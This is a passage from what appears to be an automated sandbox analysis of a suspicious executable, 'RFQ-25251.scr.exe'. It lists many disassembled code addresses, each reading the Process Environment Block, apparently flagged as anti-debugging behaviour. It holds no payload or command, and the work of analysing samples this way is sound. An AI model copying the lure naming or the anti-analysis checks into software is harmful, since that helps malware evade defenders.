                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012A01F8 mov eax, dword ptr fs:[00000030h]7_2_012A01F8
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_013361C3 mov eax, dword ptr fs:[00000030h]7_2_013361C3
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_013361C3 mov eax, dword ptr fs:[00000030h]7_2_013361C3
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012EE1D0 mov eax, dword ptr fs:[00000030h]7_2_012EE1D0
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012EE1D0 mov eax, dword ptr fs:[00000030h]7_2_012EE1D0
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012EE1D0 mov ecx, dword ptr fs:[00000030h]7_2_012EE1D0
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012EE1D0 mov eax, dword ptr fs:[00000030h]7_2_012EE1D0
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012EE1D0 mov eax, dword ptr fs:[00000030h]7_2_012EE1D0
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_01306030 mov eax, dword ptr fs:[00000030h]7_2_01306030
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_0126A020 mov eax, dword ptr fs:[00000030h]7_2_0126A020
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_0126C020 mov eax, dword ptr fs:[00000030h]7_2_0126C020
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012F4000 mov ecx, dword ptr fs:[00000030h]7_2_012F4000
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_01312000 mov eax, dword ptr fs:[00000030h]7_2_01312000
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_01312000 mov eax, dword ptr fs:[00000030h]7_2_01312000
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_01312000 mov eax, dword ptr fs:[00000030h]7_2_01312000
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_01312000 mov eax, dword ptr fs:[00000030h]7_2_01312000
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_01312000 mov eax, dword ptr fs:[00000030h]7_2_01312000
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_01312000 mov eax, dword ptr fs:[00000030h]7_2_01312000
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_01312000 mov eax, dword ptr fs:[00000030h]7_2_01312000
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_01312000 mov eax, dword ptr fs:[00000030h]7_2_01312000
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_0128E016 mov eax, dword ptr fs:[00000030h]7_2_0128E016
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_0128E016 mov eax, dword ptr fs:[00000030h]7_2_0128E016
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_0128E016 mov eax, dword ptr fs:[00000030h]7_2_0128E016
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_0128E016 mov eax, dword ptr fs:[00000030h]7_2_0128E016
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_0129C073 mov eax, dword ptr fs:[00000030h]7_2_0129C073
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_01272050 mov eax, dword ptr fs:[00000030h]7_2_01272050
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012F6050 mov eax, dword ptr fs:[00000030h]7_2_012F6050
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012680A0 mov eax, dword ptr fs:[00000030h]7_2_012680A0
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_013360B8 mov eax, dword ptr fs:[00000030h]7_2_013360B8
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_013360B8 mov ecx, dword ptr fs:[00000030h]7_2_013360B8
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_013080A8 mov eax, dword ptr fs:[00000030h]7_2_013080A8
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_0127208A mov eax, dword ptr fs:[00000030h]7_2_0127208A
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_0126A0E3 mov ecx, dword ptr fs:[00000030h]7_2_0126A0E3
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012780E9 mov eax, dword ptr fs:[00000030h]7_2_012780E9
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012F60E0 mov eax, dword ptr fs:[00000030h]7_2_012F60E0
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_0126C0F0 mov eax, dword ptr fs:[00000030h]7_2_0126C0F0
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012B20F0 mov ecx, dword ptr fs:[00000030h]7_2_012B20F0
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012F20DE mov eax, dword ptr fs:[00000030h]7_2_012F20DE
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_01348324 mov eax, dword ptr fs:[00000030h]7_2_01348324
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_01348324 mov ecx, dword ptr fs:[00000030h]7_2_01348324
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_01348324 mov eax, dword ptr fs:[00000030h]7_2_01348324
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_01348324 mov eax, dword ptr fs:[00000030h]7_2_01348324
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012AA30B mov eax, dword ptr fs:[00000030h]7_2_012AA30B
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012AA30B mov eax, dword ptr fs:[00000030h]7_2_012AA30B
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012AA30B mov eax, dword ptr fs:[00000030h]7_2_012AA30B
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_0126C310 mov ecx, dword ptr fs:[00000030h]7_2_0126C310
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_01290310 mov ecx, dword ptr fs:[00000030h]7_2_01290310
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_0131437C mov eax, dword ptr fs:[00000030h]7_2_0131437C
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_0133A352 mov eax, dword ptr fs:[00000030h]7_2_0133A352
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_01318350 mov ecx, dword ptr fs:[00000030h]7_2_01318350
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012F2349 mov eax, dword ptr fs:[00000030h]7_2_012F2349
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012F2349 mov eax, dword ptr fs:[00000030h]7_2_012F2349
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012F2349 mov eax, dword ptr fs:[00000030h]7_2_012F2349
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012F2349 mov eax, dword ptr fs:[00000030h]7_2_012F2349
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012F2349 mov eax, dword ptr fs:[00000030h]7_2_012F2349
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012F2349 mov eax, dword ptr fs:[00000030h]7_2_012F2349
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012F2349 mov eax, dword ptr fs:[00000030h]7_2_012F2349
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012F2349 mov eax, dword ptr fs:[00000030h]7_2_012F2349
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012F2349 mov eax, dword ptr fs:[00000030h]7_2_012F2349
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012F2349 mov eax, dword ptr fs:[00000030h]7_2_012F2349
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012F2349 mov eax, dword ptr fs:[00000030h]7_2_012F2349
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012F2349 mov eax, dword ptr fs:[00000030h]7_2_012F2349
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012F2349 mov eax, dword ptr fs:[00000030h]7_2_012F2349
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012F2349 mov eax, dword ptr fs:[00000030h]7_2_012F2349
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012F2349 mov eax, dword ptr fs:[00000030h]7_2_012F2349
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012F035C mov eax, dword ptr fs:[00000030h]7_2_012F035C
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012F035C mov eax, dword ptr fs:[00000030h]7_2_012F035C
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012F035C mov eax, dword ptr fs:[00000030h]7_2_012F035C
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012F035C mov ecx, dword ptr fs:[00000030h]7_2_012F035C
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012F035C mov eax, dword ptr fs:[00000030h]7_2_012F035C
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012F035C mov eax, dword ptr fs:[00000030h]7_2_012F035C
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_0134634F mov eax, dword ptr fs:[00000030h]7_2_0134634F
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_0129438F mov eax, dword ptr fs:[00000030h]7_2_0129438F
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_0129438F mov eax, dword ptr fs:[00000030h]7_2_0129438F
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_0126E388 mov eax, dword ptr fs:[00000030h]7_2_0126E388
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_0126E388 mov eax, dword ptr fs:[00000030h]7_2_0126E388
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_0126E388 mov eax, dword ptr fs:[00000030h]7_2_0126E388
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_01268397 mov eax, dword ptr fs:[00000030h]7_2_01268397
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_01268397 mov eax, dword ptr fs:[00000030h]7_2_01268397
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_01268397 mov eax, dword ptr fs:[00000030h]7_2_01268397
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012803E9 mov eax, dword ptr fs:[00000030h]7_2_012803E9
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012803E9 mov eax, dword ptr fs:[00000030h]7_2_012803E9
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012803E9 mov eax, dword ptr fs:[00000030h]7_2_012803E9
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012803E9 mov eax, dword ptr fs:[00000030h]7_2_012803E9
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012803E9 mov eax, dword ptr fs:[00000030h]7_2_012803E9
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012803E9 mov eax, dword ptr fs:[00000030h]7_2_012803E9
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012803E9 mov eax, dword ptr fs:[00000030h]7_2_012803E9
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012803E9 mov eax, dword ptr fs:[00000030h]7_2_012803E9
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012A63FF mov eax, dword ptr fs:[00000030h]7_2_012A63FF
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_0128E3F0 mov eax, dword ptr fs:[00000030h]7_2_0128E3F0
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_0128E3F0 mov eax, dword ptr fs:[00000030h]7_2_0128E3F0
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_0128E3F0 mov eax, dword ptr fs:[00000030h]7_2_0128E3F0
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_013143D4 mov eax, dword ptr fs:[00000030h]7_2_013143D4
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_013143D4 mov eax, dword ptr fs:[00000030h]7_2_013143D4
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_0127A3C0 mov eax, dword ptr fs:[00000030h]7_2_0127A3C0
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_0127A3C0 mov eax, dword ptr fs:[00000030h]7_2_0127A3C0
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_0127A3C0 mov eax, dword ptr fs:[00000030h]7_2_0127A3C0
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_0127A3C0 mov eax, dword ptr fs:[00000030h]7_2_0127A3C0
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_0127A3C0 mov eax, dword ptr fs:[00000030h]7_2_0127A3C0
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_0127A3C0 mov eax, dword ptr fs:[00000030h]7_2_0127A3C0
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012783C0 mov eax, dword ptr fs:[00000030h]7_2_012783C0
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012783C0 mov eax, dword ptr fs:[00000030h]7_2_012783C0
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012783C0 mov eax, dword ptr fs:[00000030h]7_2_012783C0
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012783C0 mov eax, dword ptr fs:[00000030h]7_2_012783C0
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_0131E3DB mov eax, dword ptr fs:[00000030h]7_2_0131E3DB
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_0131E3DB mov eax, dword ptr fs:[00000030h]7_2_0131E3DB
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_0131E3DB mov ecx, dword ptr fs:[00000030h]7_2_0131E3DB
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_0131E3DB mov eax, dword ptr fs:[00000030h]7_2_0131E3DB
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_0132C3CD mov eax, dword ptr fs:[00000030h]7_2_0132C3CD
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_0126823B mov eax, dword ptr fs:[00000030h]7_2_0126823B
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_01320274 mov eax, dword ptr fs:[00000030h]7_2_01320274
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_01320274 mov eax, dword ptr fs:[00000030h]7_2_01320274
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_01320274 mov eax, dword ptr fs:[00000030h]7_2_01320274
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_01320274 mov eax, dword ptr fs:[00000030h]7_2_01320274
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_01320274 mov eax, dword ptr fs:[00000030h]7_2_01320274
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_01320274 mov eax, dword ptr fs:[00000030h]7_2_01320274
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_01320274 mov eax, dword ptr fs:[00000030h]7_2_01320274
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_01320274 mov eax, dword ptr fs:[00000030h]7_2_01320274
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_01320274 mov eax, dword ptr fs:[00000030h]7_2_01320274
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_01320274 mov eax, dword ptr fs:[00000030h]7_2_01320274
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_01320274 mov eax, dword ptr fs:[00000030h]7_2_01320274
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_01320274 mov eax, dword ptr fs:[00000030h]7_2_01320274
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_01274260 mov eax, dword ptr fs:[00000030h]7_2_01274260
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_01274260 mov eax, dword ptr fs:[00000030h]7_2_01274260
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_01274260 mov eax, dword ptr fs:[00000030h]7_2_01274260
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_0126826B mov eax, dword ptr fs:[00000030h]7_2_0126826B
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_0132A250 mov eax, dword ptr fs:[00000030h]7_2_0132A250
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_0132A250 mov eax, dword ptr fs:[00000030h]7_2_0132A250
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_0134625D mov eax, dword ptr fs:[00000030h]7_2_0134625D
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012F8243 mov eax, dword ptr fs:[00000030h]7_2_012F8243
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012F8243 mov ecx, dword ptr fs:[00000030h]7_2_012F8243
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_0126A250 mov eax, dword ptr fs:[00000030h]7_2_0126A250
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_01276259 mov eax, dword ptr fs:[00000030h]7_2_01276259
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012802A0 mov eax, dword ptr fs:[00000030h]7_2_012802A0
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012802A0 mov eax, dword ptr fs:[00000030h]7_2_012802A0
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_013062A0 mov eax, dword ptr fs:[00000030h]7_2_013062A0
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_013062A0 mov ecx, dword ptr fs:[00000030h]7_2_013062A0
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_013062A0 mov eax, dword ptr fs:[00000030h]7_2_013062A0
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_013062A0 mov eax, dword ptr fs:[00000030h]7_2_013062A0
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_013062A0 mov eax, dword ptr fs:[00000030h]7_2_013062A0
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_013062A0 mov eax, dword ptr fs:[00000030h]7_2_013062A0
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012F0283 mov eax, dword ptr fs:[00000030h]7_2_012F0283
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012F0283 mov eax, dword ptr fs:[00000030h]7_2_012F0283
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012F0283 mov eax, dword ptr fs:[00000030h]7_2_012F0283
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012AE284 mov eax, dword ptr fs:[00000030h]7_2_012AE284
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012AE284 mov eax, dword ptr fs:[00000030h]7_2_012AE284
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012802E1 mov eax, dword ptr fs:[00000030h]7_2_012802E1
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012802E1 mov eax, dword ptr fs:[00000030h]7_2_012802E1
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012802E1 mov eax, dword ptr fs:[00000030h]7_2_012802E1
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_013462D6 mov eax, dword ptr fs:[00000030h]7_2_013462D6
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_0127A2C3 mov eax, dword ptr fs:[00000030h]7_2_0127A2C3
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_0127A2C3 mov eax, dword ptr fs:[00000030h]7_2_0127A2C3
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_0127A2C3 mov eax, dword ptr fs:[00000030h]7_2_0127A2C3
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_0127A2C3 mov eax, dword ptr fs:[00000030h]7_2_0127A2C3
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_0127A2C3 mov eax, dword ptr fs:[00000030h]7_2_0127A2C3
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_0129E53E mov eax, dword ptr fs:[00000030h]7_2_0129E53E
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_0129E53E mov eax, dword ptr fs:[00000030h]7_2_0129E53E
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_0129E53E mov eax, dword ptr fs:[00000030h]7_2_0129E53E
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_0129E53E mov eax, dword ptr fs:[00000030h]7_2_0129E53E
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_0129E53E mov eax, dword ptr fs:[00000030h]7_2_0129E53E
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_01280535 mov eax, dword ptr fs:[00000030h]7_2_01280535
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_01280535 mov eax, dword ptr fs:[00000030h]7_2_01280535
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_01280535 mov eax, dword ptr fs:[00000030h]7_2_01280535
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_01280535 mov eax, dword ptr fs:[00000030h]7_2_01280535
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_01280535 mov eax, dword ptr fs:[00000030h]7_2_01280535
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_01280535 mov eax, dword ptr fs:[00000030h]7_2_01280535
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_01306500 mov eax, dword ptr fs:[00000030h]7_2_01306500
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_01344500 mov eax, dword ptr fs:[00000030h]7_2_01344500
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_01344500 mov eax, dword ptr fs:[00000030h]7_2_01344500
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_01344500 mov eax, dword ptr fs:[00000030h]7_2_01344500
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_01344500 mov eax, dword ptr fs:[00000030h]7_2_01344500
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_01344500 mov eax, dword ptr fs:[00000030h]7_2_01344500
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_01344500 mov eax, dword ptr fs:[00000030h]7_2_01344500
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_01344500 mov eax, dword ptr fs:[00000030h]7_2_01344500
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012A656A mov eax, dword ptr fs:[00000030h]7_2_012A656A
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012A656A mov eax, dword ptr fs:[00000030h]7_2_012A656A
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012A656A mov eax, dword ptr fs:[00000030h]7_2_012A656A
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_01278550 mov eax, dword ptr fs:[00000030h]7_2_01278550
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_01278550 mov eax, dword ptr fs:[00000030h]7_2_01278550
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012F05A7 mov eax, dword ptr fs:[00000030h]7_2_012F05A7
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012F05A7 mov eax, dword ptr fs:[00000030h]7_2_012F05A7
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012F05A7 mov eax, dword ptr fs:[00000030h]7_2_012F05A7
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012945B1 mov eax, dword ptr fs:[00000030h]7_2_012945B1
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012945B1 mov eax, dword ptr fs:[00000030h]7_2_012945B1
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012A4588 mov eax, dword ptr fs:[00000030h]7_2_012A4588
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_01272582 mov eax, dword ptr fs:[00000030h]7_2_01272582
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_01272582 mov ecx, dword ptr fs:[00000030h]7_2_01272582
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012AE59C mov eax, dword ptr fs:[00000030h]7_2_012AE59C
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012725E0 mov eax, dword ptr fs:[00000030h]7_2_012725E0
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012AC5ED mov eax, dword ptr fs:[00000030h]7_2_012AC5ED
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012AC5ED mov eax, dword ptr fs:[00000030h]7_2_012AC5ED
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_0129E5E7 mov eax, dword ptr fs:[00000030h]7_2_0129E5E7
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_0129E5E7 mov eax, dword ptr fs:[00000030h]7_2_0129E5E7
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_0129E5E7 mov eax, dword ptr fs:[00000030h]7_2_0129E5E7
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_0129E5E7 mov eax, dword ptr fs:[00000030h]7_2_0129E5E7
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_0129E5E7 mov eax, dword ptr fs:[00000030h]7_2_0129E5E7
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_0129E5E7 mov eax, dword ptr fs:[00000030h]7_2_0129E5E7
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_0129E5E7 mov eax, dword ptr fs:[00000030h]7_2_0129E5E7
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_0129E5E7 mov eax, dword ptr fs:[00000030h]7_2_0129E5E7
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012AE5CF mov eax, dword ptr fs:[00000030h]7_2_012AE5CF
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012AE5CF mov eax, dword ptr fs:[00000030h]7_2_012AE5CF
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012765D0 mov eax, dword ptr fs:[00000030h]7_2_012765D0
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012AA5D0 mov eax, dword ptr fs:[00000030h]7_2_012AA5D0
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012AA5D0 mov eax, dword ptr fs:[00000030h]7_2_012AA5D0
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_0126C427 mov eax, dword ptr fs:[00000030h]7_2_0126C427
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_0126E420 mov eax, dword ptr fs:[00000030h]7_2_0126E420
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_0126E420 mov eax, dword ptr fs:[00000030h]7_2_0126E420
